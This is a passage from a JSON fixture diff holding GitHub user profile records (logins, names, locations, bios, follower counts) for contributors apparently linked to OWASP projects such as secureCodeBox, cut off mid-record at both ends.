"", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1581, + "fields": { + "nest_created_at": "2024-09-12T00:13:34.904Z", + "nest_updated_at": "2024-09-22T19:22:50.182Z", + "name": "Cyril Grossenbacher", + "login": "Freerider689", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5794592?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 28, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2013-10-28T13:57:55Z", + "updated_at": "2021-07-04T13:45:07Z", + "node_id": "MDQ6VXNlcjU3OTQ1OTI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1582, + "fields": { + "nest_created_at": "2024-09-12T00:13:36.607Z", + "nest_updated_at": "2024-09-22T19:22:49.221Z", + "name": "", + "login": "gianlucafrei", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20921075?v=4", + "company": "", + "location": "Bern Switzerland", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 17, + "public_gists_count": 2, + "public_repositories_count": 19, + "created_at": "2016-08-09T06:19:02Z", + "updated_at": "2024-08-30T03:05:45Z", + "node_id": "MDQ6VXNlcjIwOTIxMDc1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1583, + "fields": { + "nest_created_at": "2024-09-12T00:13:41.279Z", + "nest_updated_at": "2024-09-22T19:22:49.535Z", + "name": "Padi Steger (OWASP Switzerland)", + "login": "Padi-owasp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/77661049?v=4", + "company": "", + "location": "Switzerland", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-01-19T06:59:53Z", + "updated_at": "2024-07-30T13:12:18Z", + "node_id": "MDQ6VXNlcjc3NjYxMDQ5", + "bio": "I'm OWASP Switzerland Chapter co-lead and contributor to and co-lead of the OWASP Application Gateway.\r\nI'm working as a principal security consultant.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1584, + "fields": { + "nest_created_at": "2024-09-12T00:13:43.328Z", + "nest_updated_at": "2024-09-12T00:13:44.563Z", + "name": "Tomáš Matejov", + "login": "tommathee", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/55752654?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2019-09-24T14:28:30Z", + "updated_at": "2024-08-20T12:06:17Z", + "node_id": "MDQ6VXNlcjU1NzUyNjU0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1585, + "fields": { + "nest_created_at": "2024-09-12T00:14:07.609Z", + "nest_updated_at": "2024-09-22T19:39:22.401Z", + "name": "Abhineet Jayaraj", + "login": "interference-security", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5358495?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 244, + "public_gists_count": 32, + "public_repositories_count": 52, + "created_at": "2013-09-01T14:16:38Z", + "updated_at": "2024-09-08T19:15:48Z", + "node_id": "MDQ6VXNlcjUzNTg0OTU=", + "bio": "", + "is_hireable": false, + "twitter_username": "xploresec" + } +}, +{ + "model": "github.user", + "pk": 1586, + "fields": { + "nest_created_at": "2024-09-12T00:14:10.616Z", + "nest_updated_at": "2024-09-22T19:22:58.494Z", + "name": "Adrien de Beaupre", + "login": "adriendb", + "email": "adriendb@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1918063?v=4", + "company": "", + "location": "Canada", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 23, + "created_at": "2012-07-03T12:40:07Z", + "updated_at": "2021-11-15T18:52:48Z", + "node_id": "MDQ6VXNlcjE5MTgwNjM=", + "bio": "InfoSec geek,\r\nMartial artist,\r\nBreaker of the unbreakable, fixer of the broken. ", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1587, + "fields": { + "nest_created_at": "2024-09-12T00:14:11.844Z", + "nest_updated_at": "2024-09-22T19:23:04.336Z", + "name": "Mónica Pastor", + "login": "mpast", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9053588?v=4", + "company": "@auth0", + "location": "Madrid", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 24, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2014-10-07T16:04:06Z", + "updated_at": "2024-09-13T12:21:23Z", + "node_id": "MDQ6VXNlcjkwNTM1ODg=", + "bio": "Application Security & Development", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1588, + "fields": { + "nest_created_at": "2024-09-12T00:14:14.933Z", + "nest_updated_at": "2024-09-13T05:14:40.282Z", + "name": "", + "login": "f0xp1t", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/153251075?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-12-08T02:41:38Z", + "updated_at": "2024-08-25T03:08:44Z", + "node_id": "U_kgDOCSJtAw", + "bio": "breaking-fixing , interested in how things work. Curiosity is my drive.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1589, + "fields": { + "nest_created_at": "2024-09-12T00:14:42.835Z", + "nest_updated_at": "2024-09-22T19:23:38.741Z", + "name": "SSRD", + "login": "ssrdio", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43420216?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2018-09-19T18:29:39Z", + "updated_at": "2020-04-14T13:00:22Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjQzNDIwMjE2", + "bio": "Software, Security, Research & Development", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1590, + "fields": { + "nest_created_at": "2024-09-12T00:14:46.371Z", + "nest_updated_at": "2024-09-22T19:23:42.015Z", + "name": "", + "login": "GregorSpagnolo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4869477?v=4", + "company": "@ssrdio ", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 7, + "created_at": "2013-06-28T15:35:02Z", + "updated_at": "2024-09-20T16:05:06Z", + "node_id": "MDQ6VXNlcjQ4Njk0Nzc=", + "bio": "", + "is_hireable": false, + "twitter_username": "gregorspagnolo" + } +}, +{ + "model": "github.user", + "pk": 1591, + "fields": { + "nest_created_at": "2024-09-12T00:14:48.020Z", + "nest_updated_at": "2024-09-22T19:23:42.371Z", + "name": "", + "login": "UrbanVogrin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/58254475?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-11-27T10:12:03Z", + "updated_at": "2022-05-17T07:06:07Z", + "node_id": "MDQ6VXNlcjU4MjU0NDc1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1592, + "fields": { + "nest_created_at": "2024-09-12T00:15:22.137Z", + "nest_updated_at": "2024-09-13T05:13:33.826Z", + "name": "Nikita Stupin", + "login": "nikitastupin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/18281368?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 22, + "followers_count": 172, + "public_gists_count": 2, + "public_repositories_count": 21, + "created_at": "2016-04-05T08:00:35Z", + "updated_at": "2024-07-30T09:19:01Z", + "node_id": "MDQ6VXNlcjE4MjgxMzY4", + "bio": "", + "is_hireable": false, + "twitter_username": "_nikitastupin" + } +}, +{ + "model": "github.user", + "pk": 1593, + "fields": { + "nest_created_at": "2024-09-12T00:15:28.148Z", + "nest_updated_at": "2024-09-22T20:24:11.725Z", + "name": "Arshan Dabirsiaghi", + "login": "nahsra", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/911610?v=4", + "company": "", + "location": "Baltimore, MD", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 41, + "public_gists_count": 0, + "public_repositories_count": 34, + "created_at": "2011-07-13T01:17:05Z", + "updated_at": "2024-08-26T23:38:52Z", + "node_id": "MDQ6VXNlcjkxMTYxMA==", + "bio": "CTO, Pixee\r\n\r\nex-Chief Scientist & Co-Founder Contrast Security", + "is_hireable": false, + "twitter_username": "nahsra" + } +}, +{ + "model": "github.user", + "pk": 1594, + "fields": { + "nest_created_at": "2024-09-12T00:15:31.348Z", + "nest_updated_at": "2024-09-12T00:15:31.348Z", + "name": "", + "login": "ankitmdesai", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23324833?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-11-07T23:58:21Z", + "updated_at": "2023-12-19T22:04:09Z", + "node_id": "MDQ6VXNlcjIzMzI0ODMz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1595, + "fields": { + "nest_created_at": "2024-09-12T00:15:32.540Z", + "nest_updated_at": "2024-09-12T00:15:32.540Z", + "name": "", + "login": "izian", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6196762?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2013-12-16T12:08:53Z", + "updated_at": "2024-06-19T14:11:30Z", + "node_id": "MDQ6VXNlcjYxOTY3NjI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1596, + "fields": { + "nest_created_at": "2024-09-12T00:15:33.371Z", + "nest_updated_at": "2024-09-12T00:15:33.371Z", + "name": "Ken Akune", + "login": "kenakune", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42453785?v=4", + "company": "", + "location": "Ontario CA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2018-08-16T23:05:46Z", + "updated_at": "2020-12-16T15:30:12Z", + "node_id": "MDQ6VXNlcjQyNDUzNzg1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1597, + "fields": { + "nest_created_at": "2024-09-12T00:15:34.606Z", + "nest_updated_at": "2024-09-12T00:15:34.606Z", + "name": "", + "login": "bijarniy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/89252279?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2021-08-20T10:27:19Z", + "updated_at": "2023-08-01T09:43:50Z", + "node_id": "MDQ6VXNlcjg5MjUyMjc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1598, + "fields": { + "nest_created_at": "2024-09-12T00:15:36.632Z", + "nest_updated_at": "2024-09-22T19:24:44.846Z", + "name": "Sebastián Passaro", + "login": "spassarop", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/30912689?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2017-08-10T22:14:25Z", + "updated_at": "2024-08-23T11:46:10Z", + "node_id": "MDQ6VXNlcjMwOTEyNjg5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1599, + "fields": { + "nest_created_at": "2024-09-12T00:15:40.658Z", + "nest_updated_at": "2024-09-22T19:28:09.631Z", + "name": "Václav Haisman", + "login": "wilx", + "email": "vhaisman@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1098563?v=4", + "company": "", + "location": "Prague", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 31, + "public_gists_count": 44, + "public_repositories_count": 109, + "created_at": "2011-10-03T11:23:48Z", + "updated_at": "2024-09-17T11:21:03Z", + "node_id": "MDQ6VXNlcjEwOTg1NjM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1600, + "fields": { + "nest_created_at": "2024-09-12T00:15:41.499Z", + "nest_updated_at": "2024-09-22T19:24:43.094Z", + "name": "Suganth M", + "login": "BloodDrag0n", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/76839308?v=4", + "company": "", + "location": "Karur, India", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2021-01-01T12:17:18Z", + "updated_at": "2024-07-16T13:10:59Z", + "node_id": "MDQ6VXNlcjc2ODM5MzA4", + "bio": "Just a learning engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1601, + "fields": { + "nest_created_at": "2024-09-12T00:15:43.536Z", + "nest_updated_at": "2024-09-12T00:15:43.536Z", + "name": "GodMeowIceSun", + "login": "GodMeowIceSun", + "email": "icesun@icesun.cn", + "avatar_url": "https://avatars.githubusercontent.com/u/53115201?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 3, + "public_repositories_count": 21, + "created_at": "2019-07-20T10:53:04Z", + "updated_at": "2024-09-09T05:54:39Z", + "node_id": "MDQ6VXNlcjUzMTE1MjAx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1602, + "fields": { + "nest_created_at": "2024-09-12T00:16:16.314Z", + "nest_updated_at": "2024-09-22T19:26:15.130Z", + "name": "", + "login": "DevSlop", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38781597?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 23, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2018-04-27T08:43:13Z", + "updated_at": "2021-12-04T08:25:52Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjM4NzgxNTk3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1603, + "fields": { + "nest_created_at": "2024-09-12T00:16:36.884Z", + "nest_updated_at": "2024-09-12T00:16:36.884Z", + "name": "Sarang Rajvansh", + "login": "sarangraj", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13793132?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2015-08-14T06:21:15Z", + "updated_at": "2024-08-11T11:29:07Z", + "node_id": "MDQ6VXNlcjEzNzkzMTMy", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1604, + "fields": { + "nest_created_at": "2024-09-12T00:16:37.751Z", + "nest_updated_at": "2024-09-13T05:13:04.301Z", + "name": "", + "login": "gabyavra", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11969114?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 78, + "followers_count": 22, + "public_gists_count": 1, + "public_repositories_count": 190, + "created_at": "2015-04-15T22:23:45Z", + "updated_at": "2024-08-20T15:21:24Z", + "node_id": "MDQ6VXNlcjExOTY5MTE0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1605, + "fields": { + "nest_created_at": "2024-09-12T00:16:42.607Z", + "nest_updated_at": "2024-09-22T19:48:58.692Z", + "name": "Franziska Bühler", + "login": "franbuehler", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17731925?v=4", + "company": "SBB", + "location": "Switzerland", + "collaborators_count": 0, + "following_count": 32, + "followers_count": 63, + "public_gists_count": 0, + "public_repositories_count": 25, + "created_at": "2016-03-08T21:18:59Z", + "updated_at": "2024-08-12T06:48:45Z", + "node_id": "MDQ6VXNlcjE3NzMxOTI1", + "bio": "Application Security Engineer", + "is_hireable": false, + "twitter_username": "bufrasch" + } +}, +{ + "model": "github.user", + "pk": 1606, + "fields": { + "nest_created_at": "2024-09-12T00:16:57.603Z", + "nest_updated_at": "2024-09-22T19:26:18.903Z", + "name": "SecurityRAT", + "login": "SecurityRAT", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19002622?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2016-05-01T17:57:44Z", + "updated_at": "2016-07-13T21:11:35Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjE5MDAyNjIy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1607, + "fields": { + "nest_created_at": "2024-09-12T00:17:00.725Z", + "nest_updated_at": "2024-09-13T05:12:44.126Z", + "name": "Samuel Marques", + "login": "samueljtmarques", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7689347?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2014-05-24T15:58:35Z", + "updated_at": "2021-04-12T08:26:21Z", + "node_id": "MDQ6VXNlcjc2ODkzNDc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1608, + "fields": { + "nest_created_at": "2024-09-12T00:17:01.146Z", + "nest_updated_at": "2024-09-22T19:26:24.091Z", + "name": "René Reuter", + "login": "AresSec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19144234?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2016-05-02T04:55:09Z", + "updated_at": "2024-05-06T11:17:45Z", + "node_id": "MDQ6VXNlcjE5MTQ0MjM0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1609, + "fields": { + "nest_created_at": "2024-09-12T00:17:02.362Z", + "nest_updated_at": "2024-09-12T00:17:02.362Z", + "name": "Christian Ruppert", + "login": "idl0r", + "email": "idl0r@qasl.de", + "avatar_url": "https://avatars.githubusercontent.com/u/32827?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 18, + "public_gists_count": 1, + "public_repositories_count": 22, + "created_at": "2008-11-05T16:31:32Z", + "updated_at": "2024-06-11T14:35:38Z", + "node_id": "MDQ6VXNlcjMyODI3", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1610, + "fields": { + "nest_created_at": "2024-09-12T00:17:13.809Z", + "nest_updated_at": "2024-09-22T19:30:07.725Z", + "name": "Jay Mbolda", + "login": "rylyade1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12633674?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2015-05-27T22:01:49Z", + "updated_at": "2024-08-19T09:34:51Z", + "node_id": "MDQ6VXNlcjEyNjMzNjc0", + "bio": "", + "is_hireable": false, + "twitter_username": "rylyade" + } +}, +{ + "model": "github.user", + "pk": 1611, + "fields": { + "nest_created_at": "2024-09-12T00:17:37.538Z", + "nest_updated_at": "2024-09-22T19:26:26.385Z", + "name": "secureCodeBox", + "login": "secureCodeBox", + "email": "securecodebox@iteratec.com", + "avatar_url": "https://avatars.githubusercontent.com/u/34573705?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 79, + "public_gists_count": 0, + "public_repositories_count": 32, + "created_at": "2017-12-15T12:25:56Z", + "updated_at": "2023-05-02T18:27:04Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjM0NTczNzA1", + "bio": "The secureCodeBox provide a toolchain for continuous security scanning (DevSecOps) of your applications to find the low-hanging fruit issues early.", + "is_hireable": false, + "twitter_username": "secureCodeBox" + } +}, +{ + "model": "github.user", + "pk": 1612, + "fields": { + "nest_created_at": "2024-09-12T00:17:41.559Z", + "nest_updated_at": "2024-09-22T20:30:49.540Z", + "name": "Jannik Hollenbach", + "login": "J12934", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13718901?v=4", + "company": "@iteratec", + "location": "Hamburg, Germany", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 68, + "public_gists_count": 9, + "public_repositories_count": 60, + "created_at": "2015-08-09T14:48:52Z", + "updated_at": "2024-03-26T20:54:44Z", + "node_id": "MDQ6VXNlcjEzNzE4OTAx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1613, + "fields": { + "nest_created_at": "2024-09-12T00:17:42.825Z", + "nest_updated_at": "2024-09-22T19:26:32.368Z", + "name": "Yannik Fuhrmeister", + "login": "fuhrmeistery", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12710254?v=4", + "company": "@iteratec", + "location": "Germany", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2015-06-02T07:53:29Z", + "updated_at": "2024-06-17T16:52:00Z", + "node_id": "MDQ6VXNlcjEyNzEwMjU0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1614, + "fields": { + "nest_created_at": "2024-09-12T00:17:44.873Z", + "nest_updated_at": "2024-09-22T19:43:52.659Z", + "name": "Robert Felber", + "login": "rseedorff", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7081348?v=4", + "company": "iteratec GmbH", + "location": "Hamburg, Germany", + "collaborators_count": 0, + "following_count": 23, + "followers_count": 21, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2014-03-27T12:56:30Z", + "updated_at": "2024-08-25T11:26:03Z", + "node_id": "MDQ6VXNlcjcwODEzNDg=", + "bio": "Project Leader @OWASP @secureCodeBox \r\nHead of IT Security @iteratec ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1615, + "fields": { + "nest_created_at": "2024-09-12T00:17:58.635Z", + "nest_updated_at": "2024-09-22T19:26:33.321Z", + "name": "Sebastian Franz", + "login": "SebieF", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32578476?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2017-10-06T17:26:10Z", + "updated_at": "2024-08-02T09:21:25Z", + "node_id": "MDQ6VXNlcjMyNTc4NDc2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1616, + "fields": { + "nest_created_at": "2024-09-12T00:18:00.274Z", + "nest_updated_at": "2024-09-22T20:27:29.193Z", + "name": "Max Maass", + "login": "malexmave", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1688580?v=4", + "company": "@iteratec", + "location": "Germany", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 49, + "public_gists_count": 8, + "public_repositories_count": 36, + "created_at": "2012-04-28T18:42:55Z", + "updated_at": "2024-09-12T12:01:42Z", + "node_id": "MDQ6VXNlcjE2ODg1ODA=", + "bio": "Senior Security specialist @Iteratec. Alumni of @seemoo-lab at TU Darmstadt", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1617, + "fields": { + "nest_created_at": "2024-09-12T00:18:03.178Z", + "nest_updated_at": "2024-09-22T19:36:29.852Z", + "name": "Jop Zitman", + "login": "EndPositive", + "email": "jop-zitman@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/25148195?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 20, + "created_at": "2017-01-16T09:20:52Z", + "updated_at": "2024-09-12T05:25:14Z", + "node_id": "MDQ6VXNlcjI1MTQ4MTk1", + "bio": "Advanced Computing at Tsinghua University", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1618, + "fields": { + "nest_created_at": "2024-09-12T00:18:05.655Z", + "nest_updated_at": "2024-09-22T19:26:32.688Z", + "name": "Sven Strittmatter", + "login": "Weltraumschaf", + "email": "ich@weltraumschaf.de", + "avatar_url": "https://avatars.githubusercontent.com/u/113232?v=4", + "company": "iteratec GmbH", + "location": "Stuttgart", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 38, + "public_gists_count": 11, + "public_repositories_count": 101, + "created_at": "2009-08-08T15:12:48Z", + "updated_at": "2024-09-17T11:15:41Z", + "node_id": "MDQ6VXNlcjExMzIzMg==", + "bio": "🇪🇺 (he/him) Security / Software Architecture / Clean Code @iteratec", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1619, + "fields": { + "nest_created_at": "2024-09-12T00:18:51.175Z", + "nest_updated_at": "2024-09-22T19:26:32.019Z", + "name": "Ilyes Ben Dlala", + "login": "Ilyesbdlala", + "email": "ilyes.bendlala@iteratec.com", + "avatar_url": "https://avatars.githubusercontent.com/u/62256235?v=4", + "company": "", + "location": "Darmstadt, DE", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 8, + "public_gists_count": 6, + "public_repositories_count": 6, + "created_at": "2020-03-16T16:28:35Z", + "updated_at": "2024-08-28T12:37:01Z", + "node_id": "MDQ6VXNlcjYyMjU2MjM1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1620, + "fields": { + "nest_created_at": "2024-09-12T00:19:00.658Z", + "nest_updated_at": "2024-09-22T19:26:44.298Z", + "name": "Vanessa Hermann", + "login": "ManuelNeuer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29129382?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-06-01T18:32:40Z", + "updated_at": "2024-08-11T10:28:01Z", + "node_id": "MDQ6VXNlcjI5MTI5Mzgy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1621, + "fields": { + "nest_created_at": "2024-09-12T00:19:03.141Z", + "nest_updated_at": "2024-09-12T00:19:03.142Z", + "name": "", + "login": "sourabhsdeshpande", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/101176914?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-03-08T09:08:00Z", + "updated_at": "2024-03-05T11:20:59Z", + "node_id": "U_kgDOBgfWUg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1622, + "fields": { + "nest_created_at": "2024-09-12T00:19:04.453Z", + "nest_updated_at": "2024-09-12T00:19:04.453Z", + "name": "_5R3U5T0N_", + "login": "renatosazup-zz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/88499872?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2021-08-05T14:52:14Z", + "updated_at": "2022-09-16T18:42:22Z", + "node_id": "MDQ6VXNlcjg4NDk5ODcy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1623, + "fields": { + "nest_created_at": "2024-09-12T00:19:11.108Z", + "nest_updated_at": "2024-09-22T19:26:35.550Z", + "name": "Rami Souai", + "login": "RamiSouai", + "email": "rami.souai@iteratec.com", + "avatar_url": "https://avatars.githubusercontent.com/u/68519768?v=4", + "company": "Iteratec", + "location": "Darmstadt", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2020-07-19T22:35:53Z", + "updated_at": "2024-02-01T20:44:50Z", + "node_id": "MDQ6VXNlcjY4NTE5NzY4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1624, + "fields": { + "nest_created_at": "2024-09-12T00:19:16.964Z", + "nest_updated_at": "2024-09-12T00:19:16.964Z", + "name": "Justin Dearing", + "login": "ascratchedhand", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4696810?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 24, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2013-06-14T09:51:13Z", + "updated_at": "2023-06-10T12:26:37Z", + "node_id": "MDQ6VXNlcjQ2OTY4MTA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1625, + "fields": { + "nest_created_at": "2024-09-12T00:19:18.720Z", + "nest_updated_at": "2024-09-12T00:19:18.720Z", + "name": "Bruno Gomes", + "login": "brunowego", + "email": "brunowego@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/441774?v=4", + "company": "@henkiz", + "location": "Worldwide", + "collaborators_count": 0, + "following_count": 